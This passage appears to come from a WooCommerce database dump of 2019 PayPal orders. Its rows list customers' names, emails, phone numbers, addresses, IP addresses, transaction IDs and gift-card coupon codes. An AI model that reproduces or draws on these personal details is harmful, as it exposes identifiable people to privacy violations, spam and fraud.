Safari/601.1'),(18896,886,'_created_via','checkout'),(18897,886,'_cart_hash','deb820194fc231bd7908adffd39ff9d2'),(18898,886,'_billing_first_name','Michele'),(18899,886,'_billing_last_name','Bertolini'),(18900,886,'_billing_email','M.bertolini@bergo-srl.com'),(18901,886,'_billing_phone','3355413583'),(18902,886,'_order_currency','EUR'),(18903,886,'_cart_discount','0'),(18904,886,'_cart_discount_tax','0'),(18905,886,'_order_shipping','0.00'),(18906,886,'_order_shipping_tax','0'),(18907,886,'_order_tax','0'),(18908,886,'_order_total','120.00'),(18909,886,'_order_version','3.6.5'),(18910,886,'_prices_include_tax','no'),(18911,886,'_billing_address_index','Michele Bertolini        M.bertolini@bergo-srl.com 3355413583'),(18912,886,'_shipping_address_index','        '),(18913,886,'is_vat_exempt','no'),(18914,886,'Quanti adulti?','4'),(18915,886,'Numero bambini fino a 6 anni','0'),(18916,886,'Numero ragazzi fino a 14 anni','4'),(18917,886,'Numero ragazzi dai 15 anni in su','0'),(18918,886,'Files attached','[]'),(18919,886,'Payment type','instant'),(18920,886,'_transaction_id','2D842362XM853592L'),(18921,886,'_paypal_status','completed'),(18922,886,'PayPal Transaction Fee','4.43'),(18923,886,'_date_paid','1564238418'),(18924,886,'_paid_date','2019-07-27 16:40:18'),(18925,886,'_download_permissions_granted','yes'),(18926,886,'_recorded_sales','yes'),(18927,886,'_recorded_coupon_usage_counts','yes'),(18928,886,'_order_stock_reduced','yes'),(18929,887,'_order_key','wc_order_rFFq8qNzuKNX7'),(18930,887,'_customer_user','0'),(18931,887,'_payment_method','paypal'),(18932,887,'_payment_method_title','PayPal'),(18933,887,'_customer_ip_address','37.177.51.19'),(18934,887,'_customer_user_agent','Mozilla/5.0 (iPad; CPU OS 12_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Mobile/15E148 Safari/604.1'),(18935,887,'_created_via','checkout'),(18936,887,'_cart_hash','deb820194fc231bd7908adffd39ff9d2'),(18937,887,'_billing_first_name','Nicola'),(18938,887,'_billing_last_name','Selvatici'),(18939,887,'_billing_email','avesella3@gmail.com'),(18940,887,'_billing_phone','3356248553'),(18941,887,'_order_currency','EUR'),(18942,887,'_cart_discount','0'),(18943,887,'_cart_discount_tax','0'),(18944,887,'_order_shipping','0.00'),(18945,887,'_order_shipping_tax','0'),(18946,887,'_order_tax','0'),(18947,887,'_order_total','120.00'),(18948,887,'_order_version','3.6.5'),(18949,887,'_prices_include_tax','no'),(18950,887,'_billing_address_index','Nicola Selvatici        avesella3@gmail.com 3356248553'),(18951,887,'_shipping_address_index','        '),(18952,887,'is_vat_exempt','no'),(18953,887,'Quanti adulti?','4'),(18954,887,'Numero bambini fino a 6 anni','0'),(18955,887,'Numero ragazzi fino a 14 anni','4'),(18956,887,'Numero ragazzi dai 15 anni in su','0'),(18957,887,'Files attached','[]'),(18958,887,'Payment type','instant'),(18959,887,'_transaction_id','3V3856834M1548515'),(18960,887,'_paypal_status','completed'),(18961,887,'PayPal Transaction Fee','4.43'),(18962,887,'_date_paid','1565359043'),(18963,887,'_paid_date','2019-08-09 15:57:23'),(18964,887,'_download_permissions_granted','yes'),(18965,887,'_recorded_sales','yes'),(18966,887,'_recorded_coupon_usage_counts','yes'),(18967,887,'_order_stock_reduced','yes'),(18968,888,'_order_key','wc_order_t9hujb7VxG5Hg'),(18969,888,'_customer_user','0'),(18970,888,'_payment_method','paypal'),(18971,888,'_payment_method_title','PayPal'),(18972,888,'_customer_ip_address','2.42.217.66'),(18973,888,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36'),(18974,888,'_created_via','checkout'),(18975,888,'_cart_hash','deb820194fc231bd7908adffd39ff9d2'),(18976,888,'_billing_first_name','Francesca'),(18977,888,'_billing_last_name','Bellini'),(18978,888,'_billing_address_1','Via G.B. Vico 3'),(18979,888,'_billing_city','Imola'),(18980,888,'_billing_email','filippogiliberti94@gmail.com'),(18981,888,'_billing_phone','3396298306'),(18982,888,'_order_currency','EUR'),(18983,888,'_cart_discount','0'),(18984,888,'_cart_discount_tax','0'),(18985,888,'_order_shipping','0.00'),(18986,888,'_order_shipping_tax','0'),(18987,888,'_order_tax','0'),(18988,888,'_order_total','120.00'),(18989,888,'_order_version','3.6.5'),(18990,888,'_prices_include_tax','no'),(18991,888,'_billing_address_index','Francesca Bellini  Via G.B. Vico 3  Imola    filippogiliberti94@gmail.com 3396298306'),(18992,888,'_shipping_address_index','        '),(18993,888,'is_vat_exempt','no'),(18994,888,'Quanti adulti?','8'),(18995,888,'Numero bambini fino a 6 anni','0'),(18996,888,'Numero ragazzi fino a 14 anni','0'),(18997,888,'Numero ragazzi dai 15 anni in su','1'),(18998,888,'Files attached','[]'),(18999,888,'Payment type','instant'),(19000,888,'_transaction_id','86C0562021386352W'),(19001,888,'_paypal_status','completed'),(19002,888,'PayPal Transaction Fee','4.43'),(19003,888,'_date_paid','1565781168'),(19004,888,'_paid_date','2019-08-14 13:12:48'),(19005,888,'_download_permissions_granted','yes'),(19006,888,'_recorded_sales','yes'),(19007,888,'_recorded_coupon_usage_counts','yes'),(19008,888,'_order_stock_reduced','yes'),(19009,889,'_order_key','wc_order_L0KQ4H1Pl7DzN'),(19010,889,'_customer_user','0'),(19011,889,'_payment_method','paypal'),(19012,889,'_payment_method_title','PayPal'),(19013,889,'_customer_ip_address','151.36.13.0'),(19014,889,'_customer_user_agent','Mozilla/5.0 (Linux; U; Android 9; it-it; Redmi 7 Build/PKQ1.181021.001) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/61.0.3163.128 Mobile Safari/537.36 XiaoMi/MiuiBrowser/10.7.2-g'),(19015,889,'_created_via','checkout'),(19016,889,'_cart_hash','4748e0f369257c5c04a8906517a557af'),(19017,889,'_billing_first_name','Maria'),(19018,889,'_billing_last_name','Dyatlova'),(19019,889,'_billing_city','Rimini'),(19020,889,'_billing_email','maria11556@mail.ru'),(19021,889,'_billing_phone','3899376641'),(19022,889,'_order_currency','EUR'),(19023,889,'_cart_discount','0'),(19024,889,'_cart_discount_tax','0'),(19025,889,'_order_shipping','0.00'),(19026,889,'_order_shipping_tax','0'),(19027,889,'_order_tax','0'),(19028,889,'_order_total','125.00'),(19029,889,'_order_version','3.6.5'),(19030,889,'_prices_include_tax','no'),(19031,889,'_billing_address_index','Maria Dyatlova    Rimini    maria11556@mail.ru 3899376641'),(19032,889,'_shipping_address_index','        '),(19033,889,'is_vat_exempt','no'),(19034,889,'Quanti adulti?',''),(19035,889,'Numero bambini fino a 6 anni','0'),(19036,889,'Numero ragazzi fino a 14 anni','0'),(19037,889,'Numero ragazzi dai 15 anni in su','0'),(19038,889,'Files attached','[]'),(19039,890,'_order_key','wc_order_GFsJ3P60uu66Z'),(19040,890,'_customer_user','57'),(19041,890,'_payment_method','paypal'),(19042,890,'_payment_method_title','PayPal'),(19043,890,'_customer_ip_address','151.36.13.0'),(19044,890,'_customer_user_agent','Mozilla/5.0 (Linux; U; Android 9; it-it; Redmi 7 Build/PKQ1.181021.001) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/61.0.3163.128 Mobile Safari/537.36 XiaoMi/MiuiBrowser/10.7.2-g'),(19045,890,'_created_via','checkout'),(19046,890,'_cart_hash','bc8766ba98a1ab8af743bd3c6d623ff3'),(19047,890,'_billing_first_name','Maria'),(19048,890,'_billing_last_name','Dyatlova'),(19049,890,'_billing_city','Rimini'),(19050,890,'_billing_email','maria11556@mail.ru'),(19051,890,'_billing_phone','3899376641'),(19052,890,'_order_currency','EUR'),(19053,890,'_cart_discount','0'),(19054,890,'_cart_discount_tax','0'),(19055,890,'_order_shipping','0.00'),(19056,890,'_order_shipping_tax','0'),(19057,890,'_order_tax','0'),(19058,890,'_order_total','250.00'),(19059,890,'_order_version','3.6.5'),(19060,890,'_prices_include_tax','no'),(19061,890,'_billing_address_index','Maria Dyatlova    Rimini    maria11556@mail.ru 3899376641'),(19062,890,'_shipping_address_index','        '),(19063,890,'is_vat_exempt','no'),(19064,890,'Quanti adulti?',''),(19065,890,'Numero bambini fino a 6 anni','0'),(19066,890,'Numero ragazzi fino a 14 anni','0'),(19067,890,'Numero ragazzi dai 15 anni in su','0'),(19068,890,'Files attached','[]'),(19069,891,'_order_key','wc_order_CE3MBPOanj6n1'),(19070,891,'_customer_user','57'),(19071,891,'_payment_method','paypal'),(19072,891,'_payment_method_title','PayPal'),(19073,891,'_customer_ip_address','151.36.13.0'),(19074,891,'_customer_user_agent','Mozilla/5.0 (Linux; U; Android 9; it-it; Redmi 7 Build/PKQ1.181021.001) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/61.0.3163.128 Mobile Safari/537.36 XiaoMi/MiuiBrowser/10.7.2-g'),(19075,891,'_created_via','checkout'),(19076,891,'_cart_hash','35969e64d49a192951ccf7779c42df1e'),(19077,891,'_billing_first_name','Maria'),(19078,891,'_billing_last_name','Dyatlova'),(19079,891,'_billing_city','Rimini'),(19080,891,'_billing_email','maria11556@mail.ru'),(19081,891,'_billing_phone','3899376641'),(19082,891,'_order_currency','EUR'),(19083,891,'_cart_discount','0'),(19084,891,'_cart_discount_tax','0'),(19085,891,'_order_shipping','0.00'),(19086,891,'_order_shipping_tax','0'),(19087,891,'_order_tax','0'),(19088,891,'_order_total','125.00'),(19089,891,'_order_version','3.6.5'),(19090,891,'_prices_include_tax','no'),(19091,891,'_billing_address_index','Maria Dyatlova    Rimini    maria11556@mail.ru 3899376641'),(19092,891,'_shipping_address_index','        '),(19093,891,'is_vat_exempt','no'),(19094,891,'Quanti adulti?',''),(19095,891,'Numero bambini fino a 6 anni','0'),(19096,891,'Numero ragazzi fino a 14 anni','0'),(19097,891,'Numero ragazzi dai 15 anni in su','0'),(19098,891,'Files attached','[]'),(19099,891,'Payment type','instant'),(19100,891,'_transaction_id','7GJ42055NW549801W'),(19101,891,'_paypal_status','completed'),(19102,891,'PayPal Transaction Fee','4.60'),(19103,891,'_date_paid','1565793840'),(19104,891,'_paid_date','2019-08-14 16:44:00'),(19105,891,'_download_permissions_granted','yes'),(19106,891,'_recorded_sales','yes'),(19107,891,'_recorded_coupon_usage_counts','yes'),(19108,891,'_order_stock_reduced','yes'),(19109,892,'discount_type','fixed_cart'),(19110,892,'coupon_amount','125'),(19111,892,'individual_use','no'),(19112,892,'usage_limit','1'),(19113,892,'date_expires','1581292800'),(19114,892,'apply_before_tax','no'),(19115,892,'free_shipping','yes'),(19116,892,'minimum_amount',''),(19117,892,'maximum_amount',''),(19118,892,'exclude_sale_items','no'),(19119,892,'exclude_product_ids',''),(19120,892,'exclude_product_categories',''),(19121,892,'product_ids',''),(19122,892,'product_categories','a:0:{}'),(19123,892,'mwb_wgm_giftcard_coupon','891'),(19124,892,'mwb_wgm_giftcard_coupon_unique','online'),(19125,892,'mwb_wgm_giftcard_coupon_product_id','472'),(19126,892,'mwb_wgm_giftcard_coupon_mail_to','Gabriele Monesi'),(19127,891,'891#329','a:1:{i:0;s:18:\"solymarcouponKM6AW\";}'),(19128,891,'mwb_wgm_order_giftcard','send'),(19129,893,'_order_key','wc_order_EM07gq69nmoLz'),(19130,893,'_customer_user','0'),(19131,893,'_payment_method','paypal'),(19132,893,'_payment_method_title','PayPal'),(19133,893,'_customer_ip_address','93.40.214.179'),(19134,893,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),(19135,893,'_created_via','checkout'),(19136,893,'_cart_hash','edf6e13f6effc660527d81a03409843b'),(19137,893,'_billing_first_name','andrea'),(19138,893,'_billing_last_name','oppioli'),(19139,893,'_billing_city','Misano adriatico'),(19140,893,'_billing_email','andreaoppioli@gmail.com'),(19141,893,'_billing_phone','3382950079'),(19142,893,'_order_currency','EUR'),(19143,893,'_cart_discount','0'),(19144,893,'_cart_discount_tax','0'),(19145,893,'_order_shipping','0.00'),(19146,893,'_order_shipping_tax','0'),(19147,893,'_order_tax','0'),(19148,893,'_order_total','125.00'),(19149,893,'_order_version','3.6.5'),(19150,893,'_prices_include_tax','no'),(19151,893,'_billing_address_index','andrea oppioli    Misano adriatico    andreaoppioli@gmail.com 3382950079'),(19152,893,'_shipping_address_index','        '),(19153,893,'is_vat_exempt','no'),(19154,893,'Quanti adulti?','1'),(19155,893,'Numero bambini fino a 6 anni','0'),(19156,893,'Numero ragazzi fino a 14 anni','0'),(19157,893,'Numero ragazzi dai 15 anni in su','0'),(19158,893,'Files attached','[]'),(19159,893,'Payment type','instant'),(19160,893,'_transaction_id','3HB652522X688322Y'),(19161,893,'_paypal_status','completed'),(19162,893,'PayPal Transaction Fee','4.60'),(19163,893,'_date_paid','1570039792'),(19164,893,'_paid_date','2019-10-02 20:09:52'),(19165,893,'_download_permissions_granted','yes'),(19166,893,'_recorded_sales','yes'),(19167,893,'_recorded_coupon_usage_counts','yes'),(19168,893,'_order_stock_reduced','yes'),(19169,894,'discount_type','fixed_cart'),(19170,894,'coupon_amount','125'),(19171,894,'individual_use','no'),(19172,894,'usage_limit','1'),(19173,894,'date_expires','1585526400'),(19174,894,'apply_before_tax','no'),(19175,894,'free_shipping','yes'),(19176,894,'minimum_amount',''),(19177,894,'maximum_amount',''),(19178,894,'exclude_sale_items','no'),(19179,894,'exclude_product_ids',''),(19180,894,'exclude_product_categories',''),(19181,894,'product_ids',''),(19182,894,'product_categories','a:0:{}'),(19183,894,'mwb_wgm_giftcard_coupon','893'),(19184,894,'mwb_wgm_giftcard_coupon_unique','online'),(19185,894,'mwb_wgm_giftcard_coupon_product_id','472'),(19186,894,'mwb_wgm_giftcard_coupon_mail_to','Serena'),(19187,893,'893#330','a:1:{i:0;s:18:\"solymarcouponWKFDN\";}'),(19188,893,'mwb_wgm_order_giftcard','send'),(19189,895,'_order_key','wc_order_jMhC2DXHW71Un'),(19190,895,'_customer_user','0'),(19191,895,'_payment_method','paypal'),(19192,895,'_payment_method_title','PayPal'),(19193,895,'_customer_ip_address','93.34.125.13'),(19194,895,'_customer_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.1 Safari/605.1.15'),(19195,895,'_created_via','checkout'),(19196,895,'_cart_hash','1167804ad1880a3b47d874992fd9fed5'),(19197,895,'_billing_first_name','Miller'),(19198,895,'_billing_last_name','Plebani'),(19199,895,'_billing_email','miller@centrolombardorec.it'),(19200,895,'_billing_phone','3358277271'),(19201,895,'_order_currency','EUR'),(19202,895,'_cart_discount','0'),(19203,895,'_cart_discount_tax','0'),(19204,895,'_order_shipping','0.00'),(19205,895,'_order_shipping_tax','0'),(19206,895,'_order_tax','0'),(19207,895,'_order_total','240.00'),(19208,895,'_order_version','3.6.5'),(19209,895,'_prices_include_tax','no'),(19210,895,'_billing_address_index','Miller Plebani        miller@centrolombardorec.it 3358277271'),(19211,895,'_shipping_address_index','        '),(19212,895,'is_vat_exempt','no'),(19213,895,'Quanti adulti?','1'),(19214,895,'Numero bambini fino a 6 anni','0'),(19215,895,'Numero ragazzi fino a 14 anni','0'),(19216,895,'Numero ragazzi dai 15 anni in su','0'),(19217,895,'Files attached','[]'),(19218,895,'Payment type','instant'),(19219,895,'_transaction_id','68786844TU1553210'),(19220,895,'_paypal_status','completed'),(19221,895,'PayPal Transaction Fee','8.51'),(19222,895,'_date_paid','1571330020'),(19223,895,'_paid_date','2019-10-17 18:33:40'),(19224,895,'_download_permissions_granted','yes'),(19225,895,'_recorded_sales','yes'),(19226,895,'_recorded_coupon_usage_counts','yes'),(19227,895,'_order_stock_reduced','yes'),(19228,896,'_order_key','wc_order_jWgoyY4uRg8HT'),(19229,896,'_customer_user','0'),(19230,896,'_payment_method','paypal'),(19231,896,'_payment_method_title','PayPal'),(19232,896,'_customer_ip_address','93.51.175.81'),(19233,896,'_customer_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36'),(19234,896,'_created_via','checkout'),(19235,896,'_cart_hash','cc1fb12c3d10b7f9196d503cb43f0d17'),(19236,896,'_billing_first_name','Power-One Italy Spa'),(19237,896,'_billing_last_name','ABB'),(19238,896,'_billing_address_1','Via San Giorgio 642'),(19239,896,'_billing_city','Terranuova Bracciolini (AR)'),(19240,896,'_billing_email','sabrina.cherici@it.abb.com'),(19241,896,'_billing_phone','3346452751'),(19242,896,'_order_currency','EUR'),(19243,896,'_cart_discount','0'),(19244,896,'_cart_discount_tax','0'),(19245,896,'_order_shipping','0.00'),(19246,896,'_order_shipping_tax','0'),(19247,896,'_order_tax','0'),(19248,896,'_order_total','450.00'),(19249,896,'_order_version','4.2.0'),(19250,896,'_prices_include_tax','no'),(19251,896,'_billing_address_index','Power-One Italy Spa ABB  Via San Giorgio 642  Terranuova Bracciolini (AR)    sabrina.cherici@it.abb.com 3346452751'),(19252,896,'_shipping_address_index','        '),(19253,896,'is_vat_exempt','no'),(19254,896,'Quanti adulti?','1'),(19255,896,'Numero bambini fino a 6 anni','0'),(19256,896,'Numero ragazzi fino a 14 anni','0'),(19257,896,'Numero ragazzi dai 15 anni in su','0'),(19258,896,'Files attached','[]'),(19259,896,'is_vat_exempt','no'),(19260,897,'_order_key','wc_order_cdAixEQzW6cVA'),(19261,897,'_customer_user','0'),(19262,897,'_payment_method','paypal'),(19263,897,'_payment_method_title','PayPal'),(19264,897,'_customer_ip_address','93.51.175.81'),(19265,897,'_customer_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36'),(19266,897,'_created_via','checkout'),(19267,897,'_cart_hash','654fb92bb62d10d61e6269a61144a399'),(19268,897,'_billing_first_name','Power-One Italy Spa'),(19269,897,'_billing_last_name','ABB'),(19270,897,'_billing_address_1','Via San Giorgio 642'),(19271,897,'_billing_city','Terranuova Bracciolini (AR)'),(19272,897,'_billing_email','sabrina.cherici@it.abb.com'),(19273,897,'_billing_phone','3346452751'),(19274,897,'_order_currency','EUR'),(19275,897,'_cart_discount','0'),(19276,897,'_cart_discount_tax','0'),(19277,897,'_order_shipping','0.00'),(19278,897,'_order_shipping_tax','0'),(19279,897,'_order_tax','0'),(19280,897,'_order_total','375.00'),(19281,897,'_order_version','3.6.5'),(19282,897,'_prices_include_tax','no'),(19283,897,'_billing_address_index','Power-One Italy Spa ABB  Via San Giorgio 642  Terranuova Bracciolini (AR)    sabrina.cherici@it.abb.com 3346452751'),(19284,897,'_shipping_address_index','        '),(19285,897,'is_vat_exempt','no'),(19286,897,'Quanti adulti?','1'),(19287,897,'Numero bambini fino a 6 anni','0'),(19288,897,'Numero ragazzi fino a 14 anni','0'),(19289,897,'Numero ragazzi dai 15 anni in su','0'),(19290,897,'Files attached','[]'),(19291,897,'Payment type','instant'),(19292,897,'_transaction_id','13G541313Y788501R'),(19293,897,'_paypal_status','completed'),(19294,897,'PayPal Transaction Fee','13.10'),(19295,897,'_date_paid','1572526763'),(19296,897,'_paid_date','2019-10-31 13:59:23'),(19297,897,'_download_permissions_granted','yes'),(19298,897,'_recorded_sales','yes'),(19299,897,'_recorded_coupon_usage_counts','yes'),(19300,897,'_order_stock_reduced','yes'),(19301,73,'_yoast_wpseo_content_score','60'),(19302,903,'_wp_attached_file','2019/11/3-birra-2-4-19.docx'),(19303,69,'_yoast_wpseo_content_score','90'),(19304,906,'_order_key','wc_order_mRohVYRh0eNSM'),(19305,906,'_customer_user','0'),(19306,906,'_payment_method','paypal'),(19307,906,'_payment_method_title','PayPal'),(19308,906,'_customer_ip_address','93.40.213.35'),(19309,906,'_customer_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(19310,906,'_created_via','checkout'),(19311,906,'_cart_hash','b938a05fba3b4c565c39c2f4495a2425'),(19312,906,'_billing_first_name','Eveline'),(19313,906,'_billing_last_name','Tomassoni'),(19314,906,'_billing_address_1','Via Fratelli Cairoli 2/d'),(19315,906,'_billing_city','Riccione'),(19316,906,'_billing_email','evelinetomassoni@icloud.com'),(19317,906,'_billing_phone','3494678927'),(19318,906,'_order_currency','EUR'),(19319,906,'_cart_discount','0'),(19320,906,'_cart_discount_tax','0'),(19321,906,'_order_shipping','0.00'),(19322,906,'_order_shipping_tax','0'),(19323,906,'_order_tax','0'),(19324,906,'_order_total','93.00'),(19325,906,'_order_version','3.6.5'),(19326,906,'_prices_include_tax','no'),(19327,906,'_billing_address_index','Eveline Tomassoni  Via Fratelli Cairoli 2/d  Riccione    evelinetomassoni@icloud.com 3494678927'),(19328,906,'_shipping_address_index','        '),(19329,906,'is_vat_exempt','no'),(19330,906,'Quanti adulti?','2'),(19331,906,'Numero bambini fino a 6 anni','0'),(19332,906,'Numero ragazzi fino a 14 anni','0'),(19333,906,'Numero ragazzi dai 15 anni in su','0'),(19334,906,'Files attached','[]'),(19335,906,'Payment type','instant'),(19336,906,'_transaction_id','2FK088045G064252C'),(19337,906,'_paypal_status','completed'),(19338,906,'PayPal Transaction Fee','3.51'),(19339,906,'_date_paid','1576077309'),(19340,906,'_paid_date','2019-12-11 16:15:09'),(19341,906,'_download_permissions_granted','yes'),(19342,906,'_recorded_sales','yes'),(19343,906,'_recorded_coupon_usage_counts','yes'),(19344,906,'_order_stock_reduced','yes'),(19345,907,'discount_type','fixed_cart'),(19346,907,'coupon_amount','93'),(19347,907,'individual_use','no'),(19348,907,'usage_limit','1'),(19349,907,'date_expires','1591574400'),(19350,907,'apply_before_tax','no'),(19351,907,'free_shipping','yes'),(19352,907,'minimum_amount',''),(19353,907,'maximum_amount',''),(19354,907,'exclude_sale_items','no'),(19355,907,'exclude_product_ids',''),(19356,907,'exclude_product_categories',''),(19357,907,'product_ids',''),(19358,907,'product_categories','a:0:{}'),(19359,907,'mwb_wgm_giftcard_coupon','906'),(19360,907,'mwb_wgm_giftcard_coupon_unique','online'),(19361,907,'mwb_wgm_giftcard_coupon_product_id','474'),(19362,907,'mwb_wgm_giftcard_coupon_mail_to','diletta74@hotmail.it'),(19363,906,'906#339','a:1:{i:0;s:18:\"solymarcouponKOHML\";}'),(19364,906,'mwb_wgm_order_giftcard','send'),(19365,909,'_edit_lock','1576098395:1'),(19366,909,'_edit_last','1'),(19367,910,'_wp_attached_file','2019/12/capodanno2019.jpg'),(19368,910,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:710;s:6:\"height\";i:972;s:4:\"file\";s:25:\"2019/12/capodanno2019.jpg\";s:5:\"sizes\";a:12:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:25:\"capodanno2019-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"capodanno2019-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:25:\"capodanno2019-600x821.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:821;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"capodanno2019-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"capodanno2019-219x300.jpg\";s:5:\"width\";i:219;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"sydney-medium-thumb\";a:4:{s:4:\"file\";s:25:\"capodanno2019-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:25:\"capodanno2019-230x315.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:315;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:25:\"capodanno2019-350x479.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:479;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"sydney-mas-thumb\";a:4:{s:4:\"file\";s:25:\"capodanno2019-480x657.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:657;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:25:\"capodanno2019-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:25:\"capodanno2019-600x821.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:821;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"capodanno2019-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(19369,909,'_thumbnail_id','910'),(19370,909,'_wp_page_template','default'),(19373,909,'_yoast_wpseo_content_score','90'),(19374,909,'_yoast_wpseo_primary_category','1'),(19375,912,'_order_key','wc_order_0M3QdJVPVYKU6'),(19376,912,'_customer_user','0'),(19377,912,'_payment_method','paypal'),(19378,912,'_payment_method_title','PayPal'),(19379,912,'_customer_ip_address','79.49.242.105'),(19380,912,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(19381,912,'_created_via','checkout'),(19382,912,'_cart_hash','a268bce0fa573b84e89fa84370085397'),(19383,912,'_billing_first_name','Manuel'),(19384,912,'_billing_last_name','Francavilla'),(19385,912,'_billing_email','manuel.francavilla@gmail.com'),(19386,912,'_billing_phone','3287423310'),(19387,912,'_order_currency','EUR'),(19388,912,'_cart_discount','0'),(19389,912,'_cart_discount_tax','0'),(19390,912,'_order_shipping','0.00'),(19391,912,'_order_shipping_tax','0'),(19392,912,'_order_tax','0'),(19393,912,'_order_total','125.00'),(19394,912,'_order_version','3.8.1'),(19395,912,'_prices_include_tax','no'),(19396,912,'_billing_address_index','Manuel Francavilla        manuel.francavilla@gmail.com 3287423310'),(19397,912,'_shipping_address_index','        '),(19398,912,'is_vat_exempt','no'),(19399,912,'Quanti adulti?','1'),(19400,912,'Numero bambini fino a 6 anni','0'),(19401,912,'Numero ragazzi fino a 14 anni','0'),(19402,912,'Numero ragazzi dai 15 anni in su','0'),(19403,912,'Files attached','[]'),(19404,912,'Payment type','instant'),(19405,912,'_transaction_id','2L371156260467811'),(19406,912,'_paypal_status','completed'),(19407,912,'PayPal Transaction Fee','4.60'),(19408,912,'_date_paid','1576529013'),(19409,912,'_paid_date','2019-12-16 21:43:33'),(19410,912,'_download_permissions_granted','yes'),(19411,912,'_recorded_sales','yes'),(19412,912,'_recorded_coupon_usage_counts','yes'),(19413,912,'_order_stock_reduced','yes'),(19414,913,'discount_type','fixed_cart'),(19415,913,'coupon_amount','125'),(19416,913,'individual_use','no'),(19417,913,'usage_limit','1'),(19418,913,'date_expires','1592006400'),(19419,913,'apply_before_tax','no'),(19420,913,'free_shipping','yes'),(19421,913,'minimum_amount',''),(19422,913,'maximum_amount',''),(19423,913,'exclude_sale_items','no'),(19424,913,'exclude_product_ids',''),(19425,913,'exclude_product_categories',''),(19426,913,'product_ids',''),(19427,913,'product_categories','a:0:{}'),(19428,913,'mwb_wgm_giftcard_coupon','912'),(19429,913,'mwb_wgm_giftcard_coupon_unique','online'),(19430,913,'mwb_wgm_giftcard_coupon_product_id','472'),(19431,913,'mwb_wgm_giftcard_coupon_mail_to','manuel.francavilla@gmail.com'),(19432,912,'912#340','a:1:{i:0;s:18:\"solymarcouponMV85T\";}'),(19433,912,'mwb_wgm_order_giftcard','send'),(19434,914,'_order_key','wc_order_yG9neBTidrfp9'),(19435,914,'_customer_user','0'),(19436,914,'_payment_method','paypal'),(19437,914,'_payment_method_title','PayPal'),(19438,914,'_customer_ip_address','2.228.75.84'),(19439,914,'_customer_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 